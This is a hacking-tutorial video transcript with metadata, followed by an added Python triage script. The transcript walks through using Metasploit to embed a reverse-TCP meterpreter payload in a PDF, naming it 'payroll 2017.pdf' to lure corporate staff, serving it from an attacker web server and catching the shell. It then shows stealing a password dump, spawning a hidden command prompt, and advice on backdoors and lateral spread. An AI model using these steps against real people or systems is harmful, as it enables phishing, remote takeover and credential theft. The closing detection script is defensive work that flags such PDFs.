How Hackers Launch PDF Virus File And How We Can Protect Ourselves! (Cybersecurity)

Captions
Hi, and welcome back to another episode on how to hack. Today we're going to discuss embedding a malicious payload into PDF documents. As we know, there are certain applications that are used across millions, hundreds of millions of users, or could even be billions of different machines, whether it's on your endpoints, whether it's on your mobile devices, or it could even be on your server machines. What happens is that many of these applications have inherent vulnerabilities, vulnerabilities discovered by certain computer hackers through debugging methodologies. In that case, when the exploits are available, it affects hundreds of millions of users, and it is a great pain because it allows you to embed a malicious payload and then have complete control over the endpoint.

So in today's tutorial we are going to use a spear phishing methodology. It could be through email, it could be through the Social-Engineering Toolkit on certain platforms, or links that you could send to the end user: a very targeted approach. Then you have to name the file as something that will entice the user to click on the link, download the PDF file, and allow you to have complete control over the machine. So let's begin the tutorial.

In the background I have VirtualBox running, which is a virtual machine management tool. On the left side of the screen I've got Windows 7 running, so this is going to be the Windows 7 victim machine that we're going to target, and on the right side of the screen I have Kali Linux running, and I can log into Kali Linux. Again, as mentioned earlier, a lot of different applications have plenty of vulnerabilities, and it can result in millions of endpoints becoming vulnerable. Of course, one of them is Adobe Reader, which is widely used as a free tool allowing you to look into PDF documents. So what we're going to do over here is alter an existing PDF document and then post it onto our website. It could be friends, it could be people who download it, and it will open up a listener on this system and give us total control of the computer remotely.

So what we've got to do first of all is open up the Metasploit tool. We're going to zoom in a little more so it's easier for you to look at the instructions. What you've got to do is launch msfconsole -q, so we will silently open a Metasploit Framework console. I do not turn on the database; it doesn't matter for this tutorial. Once we're in msf you can enter search and look for the type, which is exploit, and you can set the platform as Windows, which we're targeting against, which is the majority of endpoints using the operating system. Once you hit this, it will actually crawl through the exploits that are available within Metasploit and show you a whole list of the exploits that you can use to hijack the Windows machine together with Adobe vulnerabilities. So we're just going to wait a little while more, as we do not have the database cache. Once we get in we can see a huge list of vulnerabilities in association with Windows systems. Again, the list is plenty; we've got to find the right one that we can use to help us get access into the system.

Over here we can see that we've got a couple that we're going to use: we've got adobe_pdf_embedded_exe, social engineering, and social engineering without JavaScript. We're going to use this one. Of course it could be any other exploit that you use here in conjunction with your attack, but most importantly, what you'll learn in today's demonstration is how to hijack systems. So we can enter use exploit/windows/fileformat/ followed by adobe_pdf_embedded_exe. This will help us use the exploit immediately. Then we can enter info, and this will show you all the information about this particular attack. It says very clearly: this module embeds a Metasploit payload into an existing PDF file. As part of the PDF file you can use a phishing attack, the Social-Engineering Toolkit that you saw in the earlier tutorials, so this will help us accelerate the pace of attacking the system.

Moving forward, what we can see here is that we've got to set our payload. You enter set payload followed by windows/meterpreter, which we will always use, as it gives us a lot more control, a lot more functionality, a lot more features, so that we can remain undetected in the attack, gain privilege escalation, and many other capabilities. Once you hit this, you can enter show options. In the show options we've got to set what the host is, the listening host. We set LHOST as 192.168.1.something, and this depends on the IP address that you actually have on your attacking machine that will host the listener. When I enter ifconfig I see that the attacking machine is 192.168.1.20. So back in the terminal that we're using for Metasploit, I'll set LHOST as 192.168.1.20. This can differ depending on the kind of lab environment you're running. Once I hit this, all we've got to do is set the file name, and it could be any file name that you want. Again, I enter show info or show options and I can see that we have a couple of items that we can set. The file name is currently evil.pdf, so of course we've got to change the file name: we can enter set filename and say payroll 2017.pdf. This will make it much easier for the user; maybe you're targeting certain corporate employees in a large enterprise, so they will be very keen about the payroll for 2017.

Once you've set the file name and you have LHOST done, you can very quickly enter the exploit command, and this will create the file that we can pass over to the victim machine. Over here we see that the file is stored at /root/.msf4/local/payroll 2017.pdf. Pretty easy. We've got to move the file from /root/.msf4/local/payroll 2017.pdf to /var/www/html, which is the place where we host our web application server that will then serve the file for the victim to download. Once we are here, all we've got to do is move down a little more and set up a listener. We're going to use exploit/multi/handler. Once we do this we can set the payload that we will be hosting: meterpreter and reverse_tcp. Once we've got this running, all you've got to do is set LHOST as 192.168.1.20, which is the IP address that we're listening on on the attacking machine. Of course we can enter show info to see the information, and show options, and we can see that we have LPORT 444, which is the default port that we'll be listening on. All you've got to do is hit run, so we've got a payload running.

Going back into the other terminal, we've got to check whether our Apache, which is a web application server, is running. We see that it is absolutely running. It could be through a spear phishing attack, it could be through any form of attacking technique that you use to send a link over to the user. All I've got to do is enter 192.168.1.20 followed by payroll 2017.pdf. When I hit this I'm immediately prompted to save some kind of template file into the system. We can replace the template file, we can click open, and it says that we cannot access it because this is opened via Internet Explorer. When we're sending it through email, or through any other kind of attacking method, it will actually open up as a download link, and in the download link the user will save the file. Over here you can see the file is being saved as payroll 2017, and it's Adobe Reader 9.1. Once we've got it we can double-click on it, click save, yes, and of course it's "view the encrypted content"; tick the "do not show this message again" box and press open.

Once we click open, we go back to our Meterpreter and see that we have a session initiated into the IP address 192.168.1.22, so this is definitely the victim machine. There are many methods for you to continue. You can enter pwd, which shows you where you are. You can enter ls, and it shows you all the files within the desktop of the victim machine. Of course you can download files: you can enter download followed by, for example, the password dump results that are over here, 127.0.0.1.pwd, so we can enter 127.0.0.1 and then put .pwd. Done. This actually helped us download files from the victim machine. Not only that, we can look at creating files within the victim machine. We can enter execute -f cmd.exe -H -i, and this puts up a command prompt in the background of the victim machine, so we can start running Windows commands. Of course we can enter something like echo you have been hacked and then write it into a file, maybe I call it hacked.txt. This will help us create a file, and what you can do is have a live interaction with the victim machine: you can enter hack.txt and this will automatically open up the Notepad file, and we can see the content within Notepad. Of course this shows that the user has been compromised.

So there you've seen how easy it was to embed a malicious executable into Adobe documents. Like the previous couple of tutorials, where you could see how we embedded malicious scripting or macros into an Excel document (it could be a Microsoft Word document, it could be an Excel sheet), in this instance we're demonstrating Adobe PDF documents. Again, the applications are endless, and we just have to find a single vulnerability that's specific for the application and then against a particular operating system, and it could easily infect millions of computer users. From there, what you can do is begin downloading sensitive information, begin implanting back doors so that you have consistent access into the system, escalate privileges using the Meterpreter you saw earlier, and many of these different attack methodologies allow you to continually have complete control over the entire enterprise landscape. Beginning with a spear phishing attack gives you a lateral advantage into the endpoint, into the enterprise environment, and from there you can begin spreading your attack across the enterprise network. So I hope you have learned something valuable today. If you have any questions, feel free to leave a comment below, and thank you so much for watching.
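As a defensive counterpart to the technique shown in the video, here is an added triage script (not from the video or its author) that flags PDF files with the same shape of payload: an /EmbeddedFile object paired with a /Launch or /OpenAction trigger, plus a PE ("MZ") image inside a stream. It inflates FlateDecode streams so names hidden in compressed object streams are also seen; the two PDF byte strings are constructed for illustration, and this is regex triage over the raw bytes, not a full PDF parser.

```python
import re
import zlib

# Name objects that deserve a second look. /EmbeddedFile together with a
# /Launch action is the shape of the "embedded EXE in a PDF" technique.
SUSPICIOUS_NAMES = (b"/EmbeddedFile", b"/Launch", b"/OpenAction", b"/JavaScript", b"/JS")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)

def _stream_bodies(data: bytes) -> list:
    """Return each stream body, inflated when it is FlateDecode (zlib) data."""
    bodies = []
    for m in STREAM_RE.finditer(data):
        try:
            bodies.append(zlib.decompress(m.group(1)))
        except zlib.error:
            bodies.append(m.group(1))  # stored uncompressed, or not zlib
    return bodies

def scan_pdf_bytes(data: bytes) -> dict:
    """Triage a PDF: count suspicious name objects and look for a PE payload."""
    streams = _stream_bodies(data)
    haystack = data + b"\n".join(streams)  # raw file plus inflated streams
    hits = {}
    for name in SUSPICIOUS_NAMES:  # lookahead stops /JS matching /JavaScript
        n = len(re.findall(re.escape(name) + rb"(?![A-Za-z])", haystack))
        if n:
            hits[name.decode()] = n
    pe_payload = any(s.startswith(b"MZ") for s in streams)
    launches_embedded = "/EmbeddedFile" in hits and "/Launch" in hits
    risk = "high" if pe_payload or launches_embedded else "medium" if hits else "low"
    return {"risk": risk, "hits": hits, "pe_payload": pe_payload}

# Constructed samples, not real files: a catalog that auto-launches an
# embedded PE image, and a plain document that declares no actions.
MALICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Names << /EmbeddedFiles << /Names [(payroll_2017.exe) 4 0 R] >> >>
  /OpenAction << /S /Launch /F (payroll_2017.exe) >> >> endobj
4 0 obj << /Type /Filespec /F (payroll_2017.exe) /EF << /F 5 0 R >> >> endobj
5 0 obj << /Type /EmbeddedFile /Length 4 >>
stream
MZ\x90\x00
endstream
endobj
trailer << /Root 1 0 R >>
"""
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
trailer << /Root 1 0 R >>
"""
```

Feeding each inbound attachment's bytes to scan_pdf_bytes and holding anything rated high for manual review is the mail-gateway use of this check.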
Info
Channel: Loi Liang Yang
Views: 151,898
Rating: 4.967907 out of 5
Keywords: hacker, hacking, cracker, cracking, kali linux, cybersecurity, security, anonymous, fbi
Id: 3RSn9JwnWlQ
Length: 11min 53sec (713 seconds)
Published: Fri Mar 30 2018